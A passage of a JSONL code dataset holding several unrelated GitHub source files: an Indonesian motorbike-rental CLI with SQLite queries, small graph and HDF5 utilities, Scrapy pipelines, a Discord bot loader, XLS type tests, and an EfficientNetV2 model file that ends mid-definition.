FROM tb_merk\"\r\n\t\thasil = self.ambilSemuaData()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Merk ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. {hasil[x][1]} (ID: {hasil[x][0]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Merk ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef ambilSatuMerk(self, inputan):\r\n\t\tself.query = \"SELECT * FROM tb_merk where id_merk = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\treturn self.ambilSatuData()\r\n\r\n\tdef ubahMerk(self, inputan):\r\n\t\tself.query = \"UPDATE tb_merk SET nama_merk = ? WHERE id_merk = ?\"\r\n\t\tself.isi = inputan\r\n\r\n\t\tself.ubahData()\r\n\t\tprint(\"Berhasil mengubah data\")\r\n\r\n\tdef hapusMerk(self, inputan):\r\n\t\tself.query = \"DELETE FROM tb_merk WHERE id_merk = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\tself.hapusData()\r\n\t\tprint(\"Berhasil menghapus data\")\r\n\r\nclass Jenis(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef inputJenis(self, data):\r\n\t\tself.query = \"INSERT INTO tb_jenismotor (nama_jenis) VALUES (?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Data berhasil diinput\")\r\n\r\n\tdef ambilJenis(self):\r\n\t\tself.query = \"SELECT * FROM tb_jenismotor\"\r\n\t\thasil = self.ambilSemuaData()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Jenis ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. {hasil[x][1]} (ID: {hasil[x][0]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Merk ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef ambilSatuJenis(self, inputan):\r\n\t\tself.query = \"SELECT * FROM tb_jenismotor where id_jenis = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\treturn self.ambilSatuData()\r\n\r\n\tdef ubahJenis(self, inputan):\r\n\t\tself.query = \"UPDATE tb_jenismotor SET nama_jenis = ? WHERE id_jenis = ?\"\r\n\t\tself.isi = inputan\r\n\r\n\t\tself.ubahData()\r\n\t\tprint(\"Berhasil mengubah data\")\r\n\r\n\tdef hapusJenis(self, inputan):\r\n\t\tself.query = \"DELETE FROM tb_jenismotor WHERE id_jenis = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\tself.hapusData()\r\n\t\tprint(\"Berhasil menghapus data\")\r\n\r\nclass Motor(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef inputMotor(self, data):\r\n\t\tself.query = \"INSERT INTO tb_motor (id_merk, id_jenis, nama_motor) VALUES (?, ?, ?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Data berhasil diinput\")\r\n\r\n\tdef ambilMotor(self):\r\n\t\tself.query = \"SELECT a.id_motor, b.nama_merk, c.nama_jenis, a.nama_motor FROM tb_motor a INNER JOIN tb_merk b using(id_merk) INNER JOIN tb_jenismotor c using(id_jenis)\"\r\n\t\thasil = self.ambilSemuaData()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Motor ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. {hasil[x][3]} (ID: {hasil[x][0]} | Merk: {hasil[x][1]} | Jenis: {hasil[x][2]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Motor ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef ambilSatuMotor(self, inputan):\r\n\t\tself.query = \"SELECT * FROM tb_motor WHERE id_motor = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\treturn self.ambilSatuData()\r\n\r\n\tdef ubahMotor(self, inputan):\r\n\t\tself.query = \"UPDATE tb_motor SET id_merk = ?, id_jenis = ?, nama_motor = ? WHERE id_motor = ?\"\r\n\t\tself.isi = inputan\r\n\r\n\t\tself.ubahData()\r\n\t\tprint(\"Berhasil mengubah data\")\r\n\r\n\tdef hapusMotor(self, inputan):\r\n\t\tself.query = \"DELETE FROM tb_motor WHERE id_jenis = ?\"\r\n\t\tself.isi = (inputan,)\r\n\r\n\t\tself.hapusData()\r\n\t\tprint(\"Berhasil menghapus data\")\r\n\r\nclass Transaksi(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef inputTransaksi(self, data):\r\n\t\tself.query = \"INSERT INTO tb_transaksi (id_motor, id_akun, tanggal_sewa) VALUES (?, ?, ?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Kamu telah menyewa motor. Silahkan cek transaksi saya untuk melihat riwayat\")\r\n\r\n\tdef ambilTransaksiUser(self, inputan):\r\n\t\tself.query = \"SELECT a.id_transaksi, b.nama_motor, a.tanggal_sewa FROM tb_transaksi a INNER JOIN tb_motor b using(id_motor) WHERE a.id_akun = ?\"\r\n\t\tself.isi = (inputan,)\r\n\t\thasil = self.ambilSemuaDataSpesifik()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Transaksi ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. {hasil[x][1]} (ID: {hasil[x][0]} | tanggal Sewa: {hasil[x][2]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Transaksi ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef ambilTransaksi(self):\r\n\t\tself.query = \"SELECT a.id_transaksi, b.nama_motor, c.nama_user, a.tanggal_sewa FROM tb_transaksi a INNER JOIN tb_motor b using(id_motor) INNER JOIN tb_akun c using(id_akun)\"\r\n\t\thasil = self.ambilSemuaData()\r\n\r\n\t\tif(hasil):\r\n\t\t\tprint(\"=== List Transaksi ===\")\r\n\r\n\t\t\tfor x in range(0, len(hasil)):\r\n\t\t\t\tprint(f\"{x+1}. {hasil[x][1]} (ID: {hasil[x][0]} | Nama Penyewa: {hasil[x][2]} | tanggal Sewa: {hasil[x][3]})\")\r\n\t\telse:\r\n\t\t\tprint(\"=== List Transaksi ===\")\r\n\t\t\tprint(\"Tidak ada data di database\")\r\n\r\n\t\treturn hasil\r\n\r\ndef merkMotor():\r\n\tprint(\"==========\")\r\n\tprint(\"Merk Motor\")\r\n\tprint(\"==========\")\r\n\tprint(\"1. Tambah Merk\\n2. Tampilkan Merk\\n3. Ubah Merk\\n4. Hapus Merk\")\r\n\tmenu = int(input(\"Pilih Menu: \"))\r\n\r\n\tkosongkanCmd()\r\n\r\n\tif(menu == 1):\r\n\t\tdata = []\r\n\t\tbanyak_data = int(input(\"Masukkan banyak merk: \"))\r\n\r\n\t\tfor x in range(0, banyak_data):\r\n\t\t\tprint(f\"===== Merk {x+1} =====\")\r\n\t\t\tnama_jenis = input(\"Input nama merk: \")\r\n\r\n\t\t\tdata.append((nama_jenis,))\r\n\r\n\t\tkosongkanCmd()\r\n\t\tMerk().inputMerk(data)\r\n\telif(menu == 2):\r\n\t\tMerk().ambilMerk()\r\n\telif(menu == 3):\r\n\t\tcek_data = Merk().ambilMerk()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id merk yang diedit: \"))\r\n\t\t\tdata_ada = Merk().ambilSatuMerk(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tnama_jenis = input(\"Input nama merk: \")\r\n\r\n\t\t\t\tdata = (nama_jenis, inputan)\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tMerk().ubahMerk(data)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Merk dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telif(menu == 4):\r\n\t\tcek_data = Merk().ambilMerk()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id merk: \"))\r\n\t\t\tdata_ada = Merk().ambilSatuMerk(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tMerk().hapusMerk(inputan)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Merk dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telse:\r\n\t\tpass\r\n\r\ndef jenisMotor():\r\n\tprint(\"==========\")\r\n\tprint(\"Jenis Motor\")\r\n\tprint(\"==========\")\r\n\tprint(\"1. Tambah Jenis\\n2. Tampilkan Jenis\\n3. Ubah Jenis\\n4. Hapus Jenis\")\r\n\tmenu = int(input(\"Pilih Menu: \"))\r\n\r\n\tkosongkanCmd()\r\n\r\n\tif(menu == 1):\r\n\t\tdata = []\r\n\t\tbanyak_data = int(input(\"Masukkan banyak jenis: \"))\r\n\r\n\t\tfor x in range(0, banyak_data):\r\n\t\t\tprint(f\"===== Merk {x+1} =====\")\r\n\t\t\tnama_merk = input(\"Input nama jenis motor: \")\r\n\r\n\t\t\tdata.append((nama_merk,))\r\n\r\n\t\tkosongkanCmd()\r\n\t\tJenis().inputJenis(data)\r\n\telif(menu == 2):\r\n\t\tJenis().ambilJenis()\r\n\telif(menu == 3):\r\n\t\tcek_data = Jenis().ambilJenis()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id jenis yang diedit: \"))\r\n\t\t\tdata_ada = Jenis().ambilSatuJenis(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tnama_merk = input(\"Input nama jenis: \")\r\n\r\n\t\t\t\tdata = (nama_merk, inputan)\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tJenis().ubahJenis(data)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Jenis dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telif(menu == 4):\r\n\t\tcek_data = Jenis().ambilJenis()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id jenis: \"))\r\n\t\t\tdata_ada = Jenis().ambilSatuJenis(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tJenis().hapusJenis(inputan)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Jenis dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telse:\r\n\t\tpass\r\n\r\ndef motor():\r\n\tprint(\"==========\")\r\n\tprint(\"Nama Motor\")\r\n\tprint(\"==========\")\r\n\tprint(\"1. Tambah Motor\\n2. Tampilkan Motor\\n3. Ubah Motor\\n4. Hapus Motor\")\r\n\tmenu = int(input(\"Pilih Menu: \"))\r\n\r\n\tkosongkanCmd()\r\n\r\n\tif(menu == 1):\r\n\t\tdata = []\r\n\t\tbanyak_data = int(input(\"Masukkan banyak motor: \"))\r\n\r\n\t\tMerk().ambilMerk()\r\n\t\tJenis().ambilJenis()\r\n\t\tMotor().ambilMotor()\r\n\r\n\t\tfor x in range(0, banyak_data):\r\n\t\t\tprint(f\"===== Merk {x+1} =====\")\r\n\t\t\tid_merk = input(\"Input id merk: \")\r\n\t\t\tid_jenis = input(\"Input id jenis: \")\r\n\t\t\tnama_motor = input(\"Input nama motor: \")\r\n\r\n\t\t\tdata.append((id_merk, id_jenis, nama_motor))\r\n\r\n\t\tkosongkanCmd()\r\n\t\tMotor().inputMotor(data)\r\n\telif(menu == 2):\r\n\t\tMotor().ambilMotor()\r\n\telif(menu == 3):\r\n\t\tcek_data = Motor().ambilMotor()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id motor yang diedit: \"))\r\n\t\t\tdata_ada = Motor().ambilSatuMotor(inputan)\r\n\t\t\t\r\n\t\t\tMerk().ambilMerk()\r\n\t\t\tJenis().ambilJenis()\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tid_merk = input(\"Input id merk: \")\r\n\t\t\t\tid_jenis = input(\"Input id jenis: \")\r\n\t\t\t\tnama_motor = input(\"Input nama motor: \")\r\n\r\n\t\t\t\tdata = (id_merk, id_jenis, nama_motor, inputan)\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tMotor().ubahMotor(data)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Motor dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telif(menu == 4):\r\n\t\tcek_data = Motor().ambilMotor()\r\n\r\n\t\tif(cek_data):\r\n\t\t\tinputan = int(input(\"Masukkan id motor: \"))\r\n\t\t\tdata_ada = Motor().ambilSatuMotor(inputan)\r\n\r\n\t\t\tif(data_ada):\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tMotor().hapusMotor(inputan)\r\n\t\t\telse:\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(f\"Motor dengan ID {inputan} tidak ada.\")\r\n\t\telse:\r\n\t\t\tpass\r\n\telse:\r\n\t\tpass\r\n\r\ndef sewaMotor():\r\n\thasil = Motor().ambilMotor()\r\n\t\r\n\tif(hasil):\r\n\t\tdata = []\r\n\r\n\t\tid_motor = int(input(\"Pilih id motor yang ingin disewa: \"))\r\n\t\tid_akun = login[0][0]\r\n\t\ttanggal_sewa = datetime.today().strftime('%Y-%m-%d')\r\n\r\n\t\tdata.append((id_motor, id_akun, tanggal_sewa))\r\n\r\n\t\tkosongkanCmd()\r\n\t\tTransaksi().inputTransaksi(data)\r\n\telse:\r\n\t\tkosongkanCmd()\r\n\t\tprint(\"Tidak ada motor yang tersedia\")\r\n\r\nwhile True:\r\n\tif(len(login) == 0):\r\n\t\tprint(\"===========================\")\r\n\t\tprint(\"Selamat Datang di Sewa Aja\")\r\n\t\tprint(\"===========================\")\r\n\t\tprint(\"1. Login\")\r\n\t\tprint(\"2. Register Akun\")\r\n\t\tmenu = int(input(\"Pilih menu: \"))\r\n\r\n\t\tkosongkanCmd()\r\n\r\n\t\tif(menu == 1):\r\n\t\t\tusername = input(\"Input username: \")\r\n\t\t\tpassword = input(\"Input password: \")\r\n\r\n\t\t\tkosongkanCmd()\r\n\t\t\tAkun().prosesLogin(username, password)\r\n\t\telif(menu == 2):\r\n\t\t\tusername = input(\"Input username: \")\r\n\t\t\tpassword = input(\"Input password: \")\r\n\t\t\tnama_user = input(\"Input nama user: \")\r\n\t\t\tno_ktp = input(\"Input No KTP: \")\r\n\t\t\talamat = input(\"Input alamat: \")\r\n\t\t\thak_akses = \"0\"\r\n\r\n\t\t\tdata = [(username, password, nama_user, no_ktp, alamat, hak_akses)]\r\n\r\n\t\t\tkosongkanCmd()\r\n\t\t\tAkun().registrasi(data)\r\n\t\telse:\r\n\t\t\tprint(\"Kamu disini dulu\")\r\n\t\t\texit()\r\n\telse:\r\n\t\tif(login[0][3] == \"1\"):\r\n\t\t\tprint(\"==========\")\r\n\t\t\tprint(\"Menu Admin\")\r\n\t\t\tprint(\"==========\")\r\n\t\t\tprint(\"1. Manajemen Merk Motor\")\r\n\t\t\tprint(\"2. Manajemen Jenis Motor\")\r\n\t\t\tprint(\"3. Manajemen Motor\")\r\n\t\t\tprint(\"4. Riwayat Transaksi (Keseluruhan)\")\r\n\t\t\tprint(\"5. Logout\")\r\n\t\t\tmenu = int(input(\"Pilih menu: \"))\r\n\r\n\t\t\tkosongkanCmd()\r\n\r\n\t\t\tif(menu == 1):\r\n\t\t\t\tmerkMotor()\r\n\t\t\telif(menu == 2):\r\n\t\t\t\tjenisMotor()\r\n\t\t\telif(menu == 3):\r\n\t\t\t\tmotor()\r\n\t\t\telif(menu == 4):\r\n\t\t\t\tTransaksi().ambilTransaksi()\r\n\t\t\telif(menu == 5):\r\n\t\t\t\tlogin = []\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(\"Berhasil logout\")\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Kamu disini dulu\")\r\n\t\t\t\texit()\r\n\t\telse:\r\n\t\t\tprint(\"=========\")\r\n\t\t\tprint(\"Menu User\")\r\n\t\t\tprint(\"=========\")\r\n\t\t\tprint(\"1. Sewa Motor\")\r\n\t\t\tprint(\"2. Transaksi Saya\")\r\n\t\t\tprint(\"3. Logout\")\r\n\t\t\tmenu = int(input(\"Pilih menu: \"))\r\n\r\n\t\t\tkosongkanCmd()\r\n\r\n\t\t\tif(menu == 1):\r\n\t\t\t\tsewaMotor()\r\n\t\t\telif(menu == 2):\r\n\t\t\t\tTransaksi().ambilTransaksiUser(login[0][0])\r\n\t\t\telif(menu == 3):\r\n\t\t\t\tlogin = []\r\n\r\n\t\t\t\tkosongkanCmd()\r\n\t\t\t\tprint(\"Berhasil logout\")\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Kamu disini dulu\")\r\n\t\t\t\texit()","repo_name":"zeeslmn/project.github.io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13578,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"13105189834","text":"#encoding: utf-8\n\n''' usage:\n\tpython tools/check/para.py $model_file.h5\n'''\n\nimport sys\n\nimport h5py\n\ndef handle_group(srcg):\n\n\trs = 0\n\tfor k, v in srcg.items():\n\t\tif isinstance(v, h5py.Dataset):\n\t\t\trs += v[:].size\n\t\telse:\n\t\t\trs += handle_group(v)\n\n\treturn rs\n\ndef handle(srcf):\n\n\tsfg = h5py.File(srcf, \"r\")\n\trs = handle_group(sfg)\n\tsfg.close()\n\tprint(rs)\n\nif __name__ == \"__main__\":\n\thandle(sys.argv[1])\n","repo_name":"jingyiz/multilingual-translation-attention-head-analysis","sub_path":"tools/check/para.py","file_name":"para.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"15099555916","text":"import heapq\n\n\nclass CheapestItinerary:\n def __init__(self, routes):\n self._graph = self._buildGraph(routes)\n\n def _buildGraph(self, routes):\n graph = {}\n for r in routes:\n if r[0] not in graph:\n graph[r[0]] = []\n\n graph[r[0]].append([r[1], r[2]])\n return graph\n\n def findCheapestPrice(self, src, dest, k):\n q = []\n heapq.heapify(q)\n heapq.heappush(q, [0, src, 0])\n\n while q:\n dqed = heapq.heappop(q)\n\n if dqed[1] == dest:\n return dqed[0]\n\n nbours = self._graph[dqed[1]]\n\n for n in nbours:\n if (dqed[2] + 1) <= k:\n heapq.heappush(q, [dqed[0] + n[1], n[0], dqed[2] + 1])\n\n return -1\n","repo_name":"AashishUpadhyay/SkinThePython","sub_path":"src/cheapestitinerary.py","file_name":"cheapestitinerary.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8630826757","text":"# This file is part of Ripple.\n\n# Ripple is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# Ripple is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with Ripple. If not, see .\n\nimport importlib\nimport util\nfrom database.database import Database\nfrom typing import Any, Dict, List, Tuple\n\ndef find_match(database, bucket_name: str, key: str, input_format: Dict[str, Any], output_format: Dict[str, Any], offsets: List[int], params: Dict[str, Any]):\n [combine, last, keys] = util.combine_instance(bucket_name, key, params)\n if combine:\n print(\"Finding match\")\n best_match = None\n match_score = 0\n format_lib = importlib.import_module(\"formats.\" + params[\"input_format\"])\n iterator_class = getattr(format_lib, \"Iterator\")\n\n keys.sort()\n with open(util.LOG_NAME, \"a+\") as f:\n for key in keys:\n entry = database.get_entry(bucket_name, key)\n it = iterator_class(entry, None)\n score: float = it.sum(format_lib.Identifiers[params[\"identifier\"]])\n\n print(\"key {0:s} score {1:d}\".format(key, score))\n f.write(\"key {0:s} score {1:d}\\n\".format(key, score))\n if score > match_score:\n best_match = key\n match_score = score\n\n if best_match is None:\n best_match = keys[0]\n\n output_format[\"ext\"] = \"match\"\n file_name = util.file_name(output_format)\n database.write(bucket_name, file_name, str.encode(best_match), {}, True)\n\n\ndef main(*argv):\n util.handle(argv, find_match)\n","repo_name":"saj9191/ripple","sub_path":"lambdas/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"39965644231","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nimport os\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom twisted.enterprise import adbapi\nimport MySQLdb\nimport MySQLdb.cursors\n\n\nclass KezhanCrawlerPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\nclass CourseImagePipeline(ImagesPipeline):\n def item_completed(self, results, item, info):\n if \"front_image_url\" in item:\n for ok, value in results:\n image_file_path = value[\"path\"]\n item[\"front_image_path\"] = image_file_path\n\n return item\n\n\nclass MySQLTwistedPipeline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n @classmethod\n def from_settings(cls, settings):\n dbparms = dict(\n host=settings[\"MYSQL_HOST\"],\n db=settings[\"MYSQL_DBNAME\"],\n user=settings[\"MYSQL_USER\"],\n passwd=settings[\"MYSQL_PASSWORD\"],\n charset='utf8',\n cursorclass=MySQLdb.cursors.DictCursor,\n use_unicode=True,\n )\n dbpool = adbapi.ConnectionPool(\"MySQLdb\", **dbparms)\n\n return cls(dbpool)\n\n def process_item(self, item, spider):\n query = self.dbpool.runInteraction(self.do_insert, item)\n query.addErrback(self.handle_error, item, spider) # 处理异常\n\n def handle_error(self, failure, item, spider):\n print(failure)\n\n def do_insert(self, cursor, item):\n insert_sql, params = item.get_insert_sql()\n print(insert_sql, params)\n cursor.execute(insert_sql, params)\n","repo_name":"SaltyFishWithKezhan/kezhan-crawler","sub_path":"kezhan_crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"74232713229","text":"\"\"\" Cody Kenstler\nUsing discord.py: https://discordpy.readthedocs.io/en/rewrite/index.html\n\"\"\"\nimport discord\nimport os\nfrom discord.ext import commands\nimport Functions\n\n# Sets what prefix triggers the bot commands\nbot = commands.Bot(command_prefix='$')\n\n\n# Announce successful connection to Discord\n@bot.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(bot))\n\n\n# Announce successful disconnect from Discord servers\n@bot.event\nasync def on_disconnect():\n print('We have logged out of Discord!')\n\n\n\"\"\" While load, unload, and reload are admin functions, \nit's outside the admin class so that it can never be removed accidentally\"\"\"\n# command allows user to load in new cogs after the bot is running\n@bot.command()\n@commands.has_permissions(manage_guild=True)\nasync def load(ctx, extension):\n bot.load_extension(f'cogs.{extension}')\n\n\n# command allows user to unload in new cogs after the bot is running\n@bot.command()\n@commands.has_permissions(manage_guild=True)\nasync def unload(ctx, extension):\n bot.unload_extension(f'cogs.{extension}')\n\n\n# Update a cog to it's newest version, if there is an error the bot will rollback\n@bot.command()\n@commands.has_permissions(manage_guild=True)\nasync def reload(ctx, extension):\n bot.reload_extension(f'cogs.{extension}')\n\n\n# Load all cogs into bot\nfor filename in os.listdir('./cogs'):\n if filename.endswith('.py'):\n bot.load_extension(f'cogs.{filename[:-3]}')\n\nbot.run(Functions.login())\n","repo_name":"Irimis/Discord_Bot","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8503388087","text":"from absl.testing import absltest\nfrom xls.dslx import span\nfrom xls.dslx.concrete_type import ArrayType\nfrom xls.dslx.concrete_type import BitsType\nfrom xls.dslx.concrete_type import ConcreteType\nfrom xls.dslx.concrete_type import TupleType\nfrom xls.dslx.parametric_expression import ParametricSymbol\n\n\nclass ConcreteTypeTest(absltest.TestCase):\n\n def test_nil_tuple(self):\n nil = TupleType(members=())\n self.assertTrue(nil.is_nil())\n\n t = TupleType(members=(nil,))\n self.assertFalse(t.is_nil())\n\n def test_equality(self):\n fake_pos = span.Pos('', 0, 0)\n fake_span = span.Span(fake_pos, fake_pos)\n p = BitsType(signed=False, size=ParametricSymbol('N', fake_span))\n c = BitsType(signed=False, size=32)\n self.assertTrue(p.__ne__(c))\n self.assertFalse(p.__eq__(c))\n\n def test_array_vs_multidim_bits_equality(self):\n a = ArrayType(BitsType(signed=False, size=5), 7)\n self.assertEqual(str(a), 'uN[5][7]')\n self.assertEqual(7 * 5, a.get_total_bit_count())\n self.assertEqual(7, a.size)\n self.assertEqual(5, a.get_element_type().size)\n self.assertEqual((7, 5), a.get_all_dims())\n\n self.assertEqual((), TupleType(()).get_all_dims())\n\n def test_array_of_tuple_all_dims(self):\n a = ArrayType(TupleType(()), 7)\n self.assertEqual((7,), a.get_all_dims())\n\n def test_stringify(self):\n u32 = BitsType(signed=False, size=32)\n tabular = [\n # type size total_bit_count str\n (ArrayType(u32, 7), 7, 32 * 7, 'uN[32][7]'),\n (u32, 32, 32, 'uN[32]'),\n ]\n for t, size, total_bit_count, s in tabular:\n self.assertEqual(t.size, size)\n self.assertEqual(t.get_total_bit_count(), total_bit_count)\n self.assertEqual(str(t), s)\n\n def test_arrayness(self):\n tabular = [\n # (type, is_array, element_count)\n (TupleType(members=()), False, None),\n (BitsType(signed=False, size=5), False, None),\n (ArrayType(BitsType(False, 5), 7), True, 7),\n (ArrayType(TupleType(members=()), 7), True, 7),\n ]\n\n for t, is_array, element_count in tabular:\n self.assertEqual(isinstance(t, ArrayType), is_array, msg=str(t))\n if is_array:\n self.assertEqual(t.size, element_count, msg=str(t))\n\n def test_named_tuple_vs_tuple_compatibility(self):\n u32 = ConcreteType.U32\n u8 = ConcreteType.U8\n named = TupleType((('x', u32), ('y', u8)), struct=None)\n unnamed = TupleType((u32, u8))\n self.assertTrue(named.compatible_with(unnamed))\n self.assertNotEqual(named, unnamed)\n self.assertEqual(named.tuple_names, ('x', 'y'))\n\n def test_array_bit_count(self):\n e = BitsType(signed=False, size=4)\n a = ArrayType(e, 3)\n self.assertEqual(a.get_total_bit_count(), 12)\n\n\nif __name__ == '__main__':\n absltest.main()\n","repo_name":"julianviera99/xls","sub_path":"xls/dslx/concrete_type_test.py","file_name":"concrete_type_test.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"12899741164","text":"\"\"\" EfficientNet https://arxiv.org/abs/2104.00298\"\"\"\nimport tensorflow as tf\nfrom pydantic import BaseModel, Field\n\nfrom .blocks import batch_norm, conv2d, make_divisible, mbconv_block, relu6\nfrom .defines import KerasLayer, MBConvParams\n\n\nclass EfficientNetParams(BaseModel):\n \"\"\"EfficientNet parameters\"\"\"\n\n blocks: list[MBConvParams] = Field(default_factory=list, description=\"EfficientNet blocks\")\n input_filters: int = Field(default=0, description=\"Input filters\")\n input_kernel_size: int | tuple[int, int] = Field(default=3, description=\"Input kernel size\")\n input_strides: int | tuple[int, int] = Field(default=2, description=\"Input stride\")\n output_filters: int = Field(default=0, description=\"Output filters\")\n include_top: bool = Field(default=True, description=\"Include top\")\n dropout: float = Field(default=0.2, description=\"Dropout rate\")\n drop_connect_rate: float = Field(default=0.2, description=\"Drop connect rate\")\n model_name: str = Field(default=\"EfficientNetV2\", description=\"Model name\")\n\n\ndef efficientnet_core(blocks: list[MBConvParams], drop_connect_rate: float = 0) -> KerasLayer:\n \"\"\"EfficientNet core\n\n Args:\n blocks (list[MBConvParam]): MBConv params\n drop_connect_rate (float, optional): Drop connect rate. Defaults to 0.\n\n Returns:\n KerasLayer: Core\n \"\"\"\n\n def layer(x: tf.Tensor) -> tf.Tensor:\n global_block_id = 0\n total_blocks = sum((b.depth for b in blocks))\n for i, block in enumerate(blocks):\n filters = make_divisible(block.filters, 8)\n for d in range(block.depth):\n name = f\"stage{i+1}.mbconv{d+1}\"\n block_drop_rate = drop_connect_rate * global_block_id / total_blocks\n x = mbconv_block(\n filters,\n block.ex_ratio,\n block.kernel_size,\n block.strides if d == 0 else 1,\n block.se_ratio,\n droprate=block_drop_rate,\n name=name,\n )(x)\n global_block_id += 1\n # END FOR\n # END FOR\n return x\n\n return layer\n\n\ndef EfficientNetV2(\n x: tf.Tensor,\n params: EfficientNetParams,\n num_classes: int | None = None,\n):\n \"\"\"Create EfficientNet V2 TF functional model\n\n Args:\n x (tf.Tensor): Input tensor\n params (EfficientNetParams): Model parameters.\n 